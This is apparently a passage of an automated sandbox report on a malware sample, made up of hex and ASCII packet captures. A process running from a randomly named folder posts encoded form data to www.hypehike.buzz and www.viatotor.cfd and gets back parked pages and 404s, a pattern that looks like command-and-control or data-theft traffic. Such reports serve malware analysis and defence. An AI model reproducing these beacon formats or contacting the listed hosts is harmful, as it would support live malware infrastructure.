                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bruqPiWh1rgjgWIXzgsDbAuCdrWosjTk9D2OexpzgzZd+kM+yzwBEtgfHYWP/EAHlWXcLs
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Mar 28, 2025 14:34:47.134953976 CET536INData Raw: 4a 68 52 70 45 76 65 59 59 6e 46 30 55 51 77 3d 3d 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 70 61 72 6b 69 6e 67 5f 73 65 73 73 69 6f 6e 3d 37 66 32 61 62 65 32 66 2d 30 34 39 31 2d 34 37 66 34 2d 38 61 38 64 2d 39 38 33 34 39 35 37 30 38 39 35
                                                                            Data Ascii: JhRpEveYYnF0UQw==set-cookie: parking_session=7f2abe2f-0491-47f4-8a8d-983495708958; expires=Fri, 28 Mar 2025 13:49:47 GMT; path=/connection: close<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA
                                                                            Mar 28, 2025 14:34:47.134965897 CET536INData Raw: 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f
                                                                            Data Ascii: th, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head>
                                                                            Mar 28, 2025 14:34:47.134977102 CET199INData Raw: 79 63 79 49 36 65 79 4a 79 5a 57 5a 6c 63 6d 56 79 49 6a 70 62 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 61 48 6c 77 5a 57 68 70 61 32 55 75 59 6e 56 36 65 69 39 71 4e 33 5a 78 4c 79 4a 64 66 53 77 69 61 47 39 7a 64 43 49 36 49 6e 64 33 64
                                                                            Data Ascii: ycyI6eyJyZWZlcmVyIjpbImh0dHA6Ly93d3cuaHlwZWhpa2UuYnV6ei9qN3ZxLyJdfSwiaG9zdCI6Ind3dy5oeXBlaGlrZS5idXp6IiwiaXAiOiI0NS45Mi4yMjkuMTM4In0K";</script><script src="/bqiNKzqTH.js"></script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.2249165199.59.243.228801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:49.691291094 CET2062OUTPOST /j7vq/ HTTP/1.1
                                                                            Host: www.hypehike.buzz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 3627
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.hypehike.buzz
                                                                            Referer: http://www.hypehike.buzz/j7vq/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 4d 65 4e 64 66 66 4d 4e 52 56 66 43 4d 77 30 62 69 7a 77 7a 5a 73 6d 57 32 48 73 33 51 2b 71 30 4d 43 49 65 71 72 79 6c 44 6b 5a 64 46 4f 67 4f 70 4e 51 64 71 4c 4c 79 45 67 64 6d 44 37 6c 6c 4c 52 2b 31 35 34 69 48 61 72 77 55 6a 36 36 67 6d 56 38 4f 6b 58 35 6c 73 35 2b 6d 51 2b 46 47 59 4c 70 78 36 71 55 49 39 56 31 7a 55 64 33 6a 2f 76 79 4e 43 70 4b 42 6b 49 73 38 32 66 66 70 30 57 7a 2f 76 4b 6e 5a 32 2b 66 31 59 49 70 47 2f 33 51 58 46 74 67 32 6c 4d 6b 75 5a 76 46 4e 63 47 59 57 4f 30 48 64 73 51 59 2f 64 6e 47 46 37 30 2f 38 71 78 4f 62 68 52 59 68 5a 4d 53 74 6f 37 58 35 2f 73 78 62 34 6e 6a 2b 7a 68 31 41 4a 4a 77 61 30 6a 4c 6f 72 43 58 43 2b 58 37 53 69 4c 46 7a 62 52 6a 44 64 61 33 5a 65 6f 34 38 48 6c 4e 33 41 72 4c 69 57 4d 74 68 61 36 2b 36 72 6a 58 62 48 63 51 78 69 6f 31 76 72 68 58 45 54 41 37 64 73 5a 6b 39 6e 71 6d 6d 4f 75 74 59 6f 69 64 66 65 6e 64 43 6c 2f 67 49 51 35 74 53 46 6c 77 68 30 31 4b 67 43 6c 78 42 61 4c 61 78 59 45 67 48 55 6a 48 48 6b 7a 43 [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=MeNdffMNRVfCMw0bizwzZsmW2Hs3Q+q0MCIeqrylDkZdFOgOpNQdqLLyEgdmD7llLR+154iHarwUj66gmV8OkX5ls5+mQ+FGYLpx6qUI9V1zUd3j/vyNCpKBkIs82ffp0Wz/vKnZ2+f1YIpG/3QXFtg2lMkuZvFNcGYWO0HdsQY/dnGF70/8qxObhRYhZMSto7X5/sxb4nj+zh1AJJwa0jLorCXC+X7SiLFzbRjDda3Zeo48HlN3ArLiWMtha6+6rjXbHcQxio1vrhXETA7dsZk9nqmmOutYoidfendCl/gIQ5tSFlwh01KgClxBaLaxYEgHUjHHkzCdmmVpJv7YWrrY9RYHi3t8iZZbnRnkj8ran3L8jPfOBPcJJcLjUFlNtP5LzLkUauixig439fhKxCaXaiF0e6Z0kj7D56GsW0XP3UpDXbEARpTmazzZWfbY5+pd+xcXOVPc3pGVt2COwpxrVuQhieYLbtjoAP1Lr34p1SQXq4YwdHnBuTtWp4uBSNwqgJSCjyoGLRrMCHj6tx8YbFZdWfP1+rxp7bpD801rWxWbsRY3S8QaeunG6zT2f9Yk/bKaqxrPYGD1rP6odw9l8zSrb3HOClch0VJH//0caezylICvroVDph1cAVeT3NIXF2zQZ2AH9heBgqZ3C4dOV9ie4NBqP1BjXtmXXMZT9M+OC5UsiWwEKkdj69oQHzZJxFdtdH05Z3Tvv0oqopFR2jhXBGx3QZvej5hG63Hbkc6o/eDKo56wM3A83BA0KiLFkhNX7VUudbROwqzbsWmi5Wz4x0UyDdlE1RUaVZ746QEAUssAS2FPFQbWXh4nVEhsGc4VUWm10JdEmImtZ5tOgEThkeXHbkSIV5R3GIigajKd0zh1OBv7AkmcnY8JCQULKwDTCNXNwUmJWQI7oWyfHJtHMgijnxokZHsGWme8sCkQBgiapZ+Ev/3DtEWxsQX0fTMLaaGSdFl54ktoA6U0MCwXRwN7PSunDNQXt58nn [TRUNCATED]
                                                                            Mar 28, 2025 14:34:49.779989004 CET2182OUTData Raw: 77 74 78 59 56 4c 53 4e 4c 6b 75 56 4f 41 32 6b 6e 2b 6b 52 75 43 77 37 50 38 78 44 67 44 49 38 43 6d 73 2b 52 56 4e 69 2f 4b 45 66 4d 74 56 4e 52 4d 66 39 33 57 42 4e 76 79 41 6e 56 30 78 6f 65 6b 62 47 41 71 75 52 44 2f 36 4d 4f 70 58 74 36 74
                                                                            Data Ascii: wtxYVLSNLkuVOA2kn+kRuCw7P8xDgDI8Cms+RVNi/KEfMtVNRMf93WBNvyAnV0xoekbGAquRD/6MOpXt6tvQAsIWumGf2H7JEZ3AeK1GGpiNgSexipgXDXHdPtgPaEKNbusm4QXFJCZHBM2otcyp3Yym/95OOjEnL2afiiZ73P2M+28uIaB8ZDAesNycJchxOnvyrFO/deKxfbvvR90k8+Ma1oAYGrbUBVarX2NvHzZZtOdWtC5
                                                                            Mar 28, 2025 14:34:49.876353025 CET536INHTTP/1.1 200 OK
                                                                            date: Fri, 28 Mar 2025 13:34:48 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1118
                                                                            x-request-id: a2de2beb-7bee-4963-b8ad-6b5099b51e31
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bruqPiWh1rgjgWIXzgsDbAuCdrWosjTk9D2OexpzgzZd+kM+yzwBEtgfHYWP/EAHlWXcLs
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Mar 28, 2025 14:34:49.876370907 CET536INData Raw: 4a 68 52 70 45 76 65 59 59 6e 46 30 55 51 77 3d 3d 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 70 61 72 6b 69 6e 67 5f 73 65 73 73 69 6f 6e 3d 61 32 64 65 32 62 65 62 2d 37 62 65 65 2d 34 39 36 33 2d 62 38 61 64 2d 36 62 35 30 39 39 62 35 31 65 33
                                                                            Data Ascii: JhRpEveYYnF0UQw==set-cookie: parking_session=a2de2beb-7bee-4963-b8ad-6b5099b51e31; expires=Fri, 28 Mar 2025 13:49:49 GMT; path=/connection: close<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA
                                                                            Mar 28, 2025 14:34:49.876377106 CET536INData Raw: 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f
                                                                            Data Ascii: th, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head>
                                                                            Mar 28, 2025 14:34:49.876394033 CET199INData Raw: 79 63 79 49 36 65 79 4a 79 5a 57 5a 6c 63 6d 56 79 49 6a 70 62 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 61 48 6c 77 5a 57 68 70 61 32 55 75 59 6e 56 36 65 69 39 71 4e 33 5a 78 4c 79 4a 64 66 53 77 69 61 47 39 7a 64 43 49 36 49 6e 64 33 64
                                                                            Data Ascii: ycyI6eyJyZWZlcmVyIjpbImh0dHA6Ly93d3cuaHlwZWhpa2UuYnV6ei9qN3ZxLyJdfSwiaG9zdCI6Ind3dy5oeXBlaGlrZS5idXp6IiwiaXAiOiI0NS45Mi4yMjkuMTM4In0K";</script><script src="/bRgBHGeZq.js"></script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.2249166199.59.243.228801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:52.318948030 CET556OUTGET /j7vq/?Up5Dxd=Bcl9cp41dlHcDC4N7AFqYtSrkG8XSNj0Dw08raKVYGNnS8Fk0dwOiPOkXhtRLsFmQzGgwtyTAOUIspu4tmMliVEfuoO5YMFyI/UM7bEFhyYTRsu/qMC3INXijMdt&RtRt=H2TxDP-0yx HTTP/1.1
                                                                            Host: www.hypehike.buzz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Mar 28, 2025 14:34:52.414884090 CET1031INHTTP/1.1 200 OK
                                                                            date: Fri, 28 Mar 2025 13:34:51 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1474
                                                                            x-request-id: 09dbe94a-e4b5-4abd-b34a-a14c29e35671
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HCBWq3vgZ6CsMvFqHxe0PABD5rR7plVvGDZNTZrwOG5aGuA9iAeItYCOhw5lntdT10ArFjDHvu3iwknV0Ei6pg==
                                                                            set-cookie: parking_session=09dbe94a-e4b5-4abd-b34a-a14c29e35671; expires=Fri, 28 Mar 2025 13:49:52 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 43 42 57 71 33 76 67 5a 36 43 73 4d 76 46 71 48 78 65 30 50 41 42 44 35 72 52 37 70 6c 56 76 47 44 5a 4e 54 5a 72 77 4f 47 35 61 47 75 41 39 69 41 65 49 74 59 43 4f 68 77 35 6c 6e 74 64 54 31 30 41 72 46 6a 44 48 76 75 33 69 77 6b 6e 56 30 45 69 36 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HCBWq3vgZ6CsMvFqHxe0PABD5rR7plVvGDZNTZrwOG5aGuA9iAeItYCOhw5lntdT10ArFjDHvu3iwknV0Ei6pg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta
                                                                            Mar 28, 2025 14:34:52.414897919 CET1031INData Raw: 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e
                                                                            Data Ascii: name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="htt
                                                                            Mar 28, 2025 14:34:52.414915085 CET101INData Raw: 58 70 36 49 69 77 69 61 58 41 69 4f 69 49 30 4e 53 34 35 4d 69 34 79 4d 6a 6b 75 4d 54 4d 34 49 6e 30 4b 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 62 73 54 42 4a 51 79 73 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70
                                                                            Data Ascii: Xp6IiwiaXAiOiI0NS45Mi4yMjkuMTM4In0K";</script><script src="/bsTBJQysc.js"></script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.2249167104.21.94.162801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:34:57.659427881 CET2062OUTPOST /awht/ HTTP/1.1
                                                                            Host: www.viatotor.cfd
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 2163
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.viatotor.cfd
                                                                            Referer: http://www.viatotor.cfd/awht/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 78 55 2b 6e 42 50 51 6b 35 67 43 62 4f 6a 52 35 36 79 38 36 74 7a 75 55 51 37 31 66 47 42 43 36 34 78 38 4e 58 31 48 59 35 76 7a 72 64 73 2f 38 39 52 67 41 6d 4b 41 41 72 70 7a 71 59 61 43 72 62 4c 48 76 36 56 68 74 4c 41 45 34 54 6b 51 70 76 55 49 58 54 63 30 76 57 4b 6c 77 42 48 47 66 71 2b 50 55 74 4b 62 64 50 2b 2b 46 76 42 48 73 7a 6b 63 6b 65 63 63 67 2b 2b 30 48 75 4a 31 6e 47 67 38 30 2f 61 38 6c 53 34 68 71 6d 78 44 32 42 6a 45 59 74 76 75 30 7a 45 76 52 72 5a 32 53 65 66 4f 31 61 49 36 44 74 37 64 62 62 4f 72 47 78 63 61 31 39 33 68 63 78 76 72 4f 30 55 41 45 33 32 30 4f 48 51 63 35 58 4a 72 47 33 69 56 42 4c 2f 67 33 45 56 38 33 42 58 63 59 47 67 51 64 58 4e 6b 38 4b 78 6d 47 6a 73 5a 4f 57 78 78 51 67 51 6d 6d 31 68 38 6c 4f 72 30 2f 2b 76 74 57 35 79 49 51 52 55 34 72 4e 44 67 4b 30 32 45 79 66 6b 77 65 35 7a 54 41 42 52 55 54 2b 79 66 51 59 63 44 6e 4b 6e 52 7a 32 73 73 75 6a 5a 76 54 44 35 34 61 58 34 63 71 66 41 50 4d 79 2f 79 4e 46 59 4a 56 56 56 55 6f 38 36 79 [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=xU+nBPQk5gCbOjR56y86tzuUQ71fGBC64x8NX1HY5vzrds/89RgAmKAArpzqYaCrbLHv6VhtLAE4TkQpvUIXTc0vWKlwBHGfq+PUtKbdP++FvBHszkckeccg++0HuJ1nGg80/a8lS4hqmxD2BjEYtvu0zEvRrZ2SefO1aI6Dt7dbbOrGxca193hcxvrO0UAE320OHQc5XJrG3iVBL/g3EV83BXcYGgQdXNk8KxmGjsZOWxxQgQmm1h8lOr0/+vtW5yIQRU4rNDgK02Eyfkwe5zTABRUT+yfQYcDnKnRz2ssujZvTD54aX4cqfAPMy/yNFYJVVVUo86yg+uWCgZqeKAfB9fyhykQcAkoS+Bvsg3nhr4RDJOVhAnFV5rdH6L89l2wJASWtXUTpwNTFGi+/wztPt6fCPzVX54GJ9KP6fLvCvWOE1f55zC3yzhhTCMuDEzhrYIHNzGCaHDp0zdJl4pG7uXmOuscjfidk5+Rve0MeHeGQhZkVsmiXCBKuSAA1//CIJa1rrc8ZbnNxVFNvWb7zNR/MZpzhNV8zi4UkHw6PlKhvsrWK5V03tcB0Yd/VvbXfBFurFfM+/ONSvsFocJg+P55tba+efocYDc3nAdwtvxwtU6R4+mc6aRLxMEhlvGYgJ2mqY3jdXmk7XNXg/GW9KR1wlAdh+epiWiSXBE0iuiSoJM+J49gVWcUuaoqVkr6iF/7Ei33KG+SQ4wFp3QMWp9tCweeGVl+GBwG4RiXRc59FiB/cMqexSuMdzahokN4EmypvxwK91aCrDglyNM118MyKjDBSCrX++tS+MEEyGvP3srxvG9UwBSVA+gtRGIpw3h/CzT8wHcKMLgPBIDQLt+JWWavF2pbof4Z/DXCV50b+TBAJbH1K243XMvs184Nh2dGxrTI9xu3E5FDecyNSTvzSfUSFmHFHeQzzu+6KS/NguxHRwcBEUs2qcLDkxkS/ul+rIpOiPd3ODB9YtqgamP2VDCcY/l1gDBehmf8jD [TRUNCATED]
                                                                            Mar 28, 2025 14:34:57.748697996 CET715OUTData Raw: 6c 63 4a 75 71 68 5a 37 67 4b 44 37 57 5a 4f 72 73 55 6c 66 54 31 4d 74 64 47 7a 39 61 68 49 6c 54 46 68 4e 6f 79 52 49 47 52 56 6e 31 73 73 4a 54 4c 37 59 4a 4c 58 65 5a 34 4b 4d 6d 37 2b 36 31 2f 35 63 34 33 45 79 4a 36 53 79 71 32 49 57 4e 30
                                                                            Data Ascii: lcJuqhZ7gKD7WZOrsUlfT1MtdGz9ahIlTFhNoyRIGRVn1ssJTL7YJLXeZ4KMm7+61/5c43EyJ6Syq2IWN0fbdS55Z1flTivpFW0Z7hP0ooT4LP7iFHYPXtTnumeaobyZkQ67IngTX4AQzmYMk+DGkGAu4U4zuSx6zCI4e6PRFE7sjuNZBZ6AZ8LeBocpFbMeWRHL25fHMqt9qzFGQH2ccmkSpKrNBl0LkDKp6iEUNHLLcFUWYGb
                                                                            Mar 28, 2025 14:34:58.018750906 CET1031INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:34:57 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43y23FhKx79Gk16HcoYUbnuqadjuX8whiep9DOCDqR3mgSDao2WnIh7jBusw47EZ9kysiupWnHhla75mdBLPbQyMUWbh3gzkpY6I3k3TxOXLr9a9sYYr2x4wbRU3O3e%2FDlKU"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9277820aa9dd0f59-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=106797&min_rtt=106797&rtt_var=53398&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=2777&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c
                                                                            Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\
                                                                            Mar 28, 2025 14:34:58.018812895 CET618INData Raw: 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d
                                                                            Data Ascii: '#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. b
                                                                            Mar 28, 2025 14:34:58.018852949 CET5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.2249168104.21.94.162801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:00.442203999 CET816OUTPOST /awht/ HTTP/1.1
                                                                            Host: www.viatotor.cfd
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 203
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.viatotor.cfd
                                                                            Referer: http://www.viatotor.cfd/awht/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 78 55 2b 6e 42 50 51 6b 35 67 43 62 4f 67 35 35 37 6a 38 36 76 54 75 55 63 62 31 66 4d 68 43 34 34 78 77 46 58 33 71 41 35 59 76 72 64 35 62 38 38 6a 49 41 6c 4b 41 44 6b 4a 79 6a 63 61 43 2b 62 4c 48 5a 36 57 35 74 4c 42 6b 34 63 6e 6f 70 2f 68 6f 55 63 4d 30 74 5a 71 6c 31 42 48 43 57 71 2b 43 52 74 4a 72 64 50 39 61 46 2b 78 58 73 6a 43 49 6b 55 4d 63 6d 38 2b 30 71 75 4a 70 2b 47 67 73 73 2f 62 51 6c 53 4a 39 71 6d 42 6a 32 4e 53 45 59 6a 50 75 33 36 6b 76 48 73 4c 48 31 5a 73 53 31 65 4b 71 36 6c 72 51 39 5a 66 4b 41 38 66 79 45 32 32 5a 78 35 4a 4f 76 78 77 4e 4c 6c 41 3d 3d
                                                                            Data Ascii: Up5Dxd=xU+nBPQk5gCbOg557j86vTuUcb1fMhC44xwFX3qA5Yvrd5b88jIAlKADkJyjcaC+bLHZ6W5tLBk4cnop/hoUcM0tZql1BHCWq+CRtJrdP9aF+xXsjCIkUMcm8+0quJp+Ggss/bQlSJ9qmBj2NSEYjPu36kvHsLH1ZsS1eKq6lrQ9ZfKA8fyE22Zx5JOvxwNLlA==
                                                                            Mar 28, 2025 14:35:00.698069096 CET1031INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:00 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vO%2B2eZwXwREyXyp08glH11SE4aqcatu%2FGY%2FRRg9JYykI9B9yyyUV871jMSSvkfsyieRBUfM%2Bfv6k9c%2BMPbifvtX37hdyCFZRtM6Pf4scB%2B8fVdgsj0n4DVZzLfzSzNTlWFjr"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9277821c1a184238-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=90326&min_rtt=90326&rtt_var=45163&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=816&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
